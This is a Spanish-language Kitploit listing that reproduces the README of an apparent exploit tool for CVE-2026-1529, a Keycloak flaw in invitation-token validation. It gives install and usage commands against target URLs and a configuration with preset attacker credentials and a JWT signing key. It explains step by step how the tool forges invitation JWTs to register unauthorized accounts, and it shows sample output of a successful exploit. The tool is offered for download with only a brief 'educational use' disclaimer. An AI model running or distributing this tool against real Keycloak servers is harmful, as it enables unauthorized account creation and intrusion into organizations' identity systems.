Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1529 — Keycloak: Registro de organización no autorizado mediante una validación incorrecta del token de invitación | Kitploit
Herramientas/GitHubGitHub/0x240x23elu/cve-2026-1529
Autenticación y AutorizaciónGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHub0x240x23elu/cve-2026-1529

CVE-2026-1529

Keycloak: Registro de organización no autorizado mediante una validación incorrecta del token de invitación

Ver Repositorio
6217hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de Explotación CVE-2026-1529 Keycloak

Python Version License Status

CVE-2026-1529: Keycloak - Registro de organización no autorizado mediante validación incorrecta del token de invitación

⚠️ ADVERTENCIA: Esta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal.

📋 Tabla de Contenidos

  • Resumen
  • Características
  • Requisitos Previos
  • Instalación
  • Uso
  • Configuración
  • Cómo Funciona
  • Salida
  • Solución de Problemas
  • Aviso Legal
  • Contribuciones
  • Créditos

🎯 Resumen

Esta herramienta demuestra una vulnerabilidad crítica en Keycloak (CVE-2026-1529) que permite el registro de organizaciones no autorizadas mediante la validación incorrecta de tokens de invitación JWT. El exploit manipula los tokens de invitación para obtener acceso no autorizado a instancias de Keycloak.

Detalles de la Vulnerabilidad:

  • ID CVE: CVE-2026-1529
  • Severidad: Crítica
  • Vector de Ataque: Red
  • Complejidad del Ataque: Baja
  • Afectados: Instancias de Keycloak con la función de invitación a organizaciones

✨ Características

  • ✅ Detección automática de vulnerabilidades
  • ✅ Manipulación de tokens JWT
  • ✅ Registro automático de usuarios
  • ✅ Verificación de inicio de sesión
  • ✅ Informes de explotación detallados
  • ✅ Parámetros configurables
  • ✅ Soporte de registro de depuración
  • ✅ Cliente HTTP con reintentos múltiples

📦 Requisitos Previos

  • Python 3.7 o superior
  • pip (gestor de paquetes de Python)
  • Entorno virtual (recomendado)
  • Instancia de Keycloak objetivo (solo pruebas autorizadas)

🚀 Instalación

Método 1: Clonar Repositorio

# Clonar el repositorio
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit

# Crear entorno virtual
python3 -m venv venv
source venv/bin/activate  # En Windows: venv\Scripts\activate

# Instalar dependencias
pip install -r requirements.txt

Método 2: Configuración Manual

# Crear estructura de directorios
mkdir -p keycloak-exploit/{utils,config,logs,output/reports}
cd keycloak-exploit

# Descargar archivos de releases o copiar manualmente
# Luego instalar dependencias
pip install requests urllib3 PyJWT

Estructura de Archivos

keycloak-exploit/
├── keycloak-exploit.py           # Script principal del exploit
├── requirements.txt              # Dependencias de Python
├── README.md                     # Este archivo
├── config/
│   └── default_config.json       # Archivo de configuración
├── utils/
│   ├── __init__.py              # Inicializador del paquete
│   ├── http_utils.py            # Utilidades del cliente HTTP
│   ├── jwt_utils.py             # Manipulación de JWT
│   └── crypto_utils.py          # Utilidades criptográficas
├── logs/                         # Registros generados automáticamente
└── output/
    └── reports/                  # Informes de explotación

💻 Uso

Uso Básico

python3 keycloak-exploit.py https://target-keycloak.com

Opciones Avanzadas

# Con token de invitación personalizado
python3 keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target.com

# Con ID de organización personalizado
python3 keycloak-exploit.py -o custom_org_id https://target.com

# Con archivo de configuración personalizado
python3 keycloak-exploit.py -c /path/to/config.json https://target.com

# Habilitar registro de depuración
python3 keycloak-exploit.py -d https://target.com

# Mostrar ayuda
python3 keycloak-exploit.py -h

# Mostrar versión
python3 keycloak-exploit.py -v

Argumentos de Línea de Comandos

ArgumentoCortoDescripción
target-URL de Keycloak objetivo (obligatorio)
--token-tToken de invitación personalizado
--org-id-oID de organización personalizado
--config-cRuta al archivo de configuración
--debug-dHabilitar registro de depuración
--version-vMostrar información de versión
--help-hMostrar mensaje de ayuda

⚙️ Configuración

Edite config/default_config.json para personalizar los parámetros del exploit:

{
    "exploit": {
        "default_username": "admin_user_2026",
        "default_password": "KeycloakCVE2026!",
        "default_email": "[email protected]",
        "timeout": 30,
        "max_retries": 3
    },
    "jwt": {
        "algorithm": "HS256",
        "secret_key": "keycloak-cve-2026-1529-exploit",
        "token_expiry": 3600
    },
    "target": {
        "endpoints": {
            "realms": "/realms",
            "organizations": "/organizations",
            "register": "/register",
            "login": "/login"
        }
    },
    "output": {
        "log_level": "INFO",
        "save_reports": true,
        "report_format": "txt"
    }
}

Opciones de Configuración

SecciónParámetroDescripciónPredeterminado
exploitdefault_usernameNombre de usuario para el registroadmin_user_2026
exploitdefault_passwordContraseña para el registroKeycloakCVE2026!
exploitdefault_emailCorreo electrónico para el registro[email protected]
exploittimeoutTiempo de espera de solicitudes HTTP (segundos)30
exploitmax_retriesMáximo de reintentos HTTP3
jwtalgorithmAlgoritmo de firma JWTHS256
jwtsecret_keyClave secreta JWTPersonalizado
jwttoken_expiryCaducidad del token (segundos)3600

🔧 Cómo Funciona

El exploit funciona en los siguientes pasos:

  1. Verificación de Vulnerabilidad

    • Se conecta a la instancia de Keycloak objetivo
    • Detecta la versión de Keycloak
    • Prueba los endpoints de organizaciones
  2. Generación/Manipulación de Tokens

    • Genera o acepta el token de invitación
    • Decodifica el token JWT
    • Manipula el ID de organización en el payload
    • Vuelve a firmar el token con la clave conocida
  3. Registro de Usuario

    • Envía el registro con el token manipulado
    • Omite la validación de organización
    • Crea una cuenta de usuario no autorizada
  4. Verificación de Inicio de Sesión

    • Prueba el inicio de sesión con las credenciales creadas
    • Genera un token de acceso
    • Proporciona la URL de inicio de sesión
  5. Generación de Informes

    • Crea un informe detallado del exploit
    • Lo guarda en output/reports/
    • Incluye todos los detalles técnicos

Diagrama del Flujo de Ataque

┌─────────────────┐
│  Verificación   │
│  del Objetivo   │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  Generar/Obtener│
│     Token       │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Manipular Token │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ Registrar Usuario│
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  Prueba de      │
│  Inicio Sesión  │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  Generar Informe│
└─────────────────┘

📊 Salida

Salida de Exploit Exitoso

============================================================
RESULTADOS DEL EXPLOIT CVE-2026-1529
============================================================
✓ El objetivo es vulnerable a CVE-2026-1529

🎯 ¡EXPLOIT EXITOSO!
Nombre de usuario: admin_user_2026
Contraseña: KeycloakCVE2026!
Correo electrónico: [email protected]
Enlace de inicio de sesión: https://target.com/realms/master/account
Descargar herramienta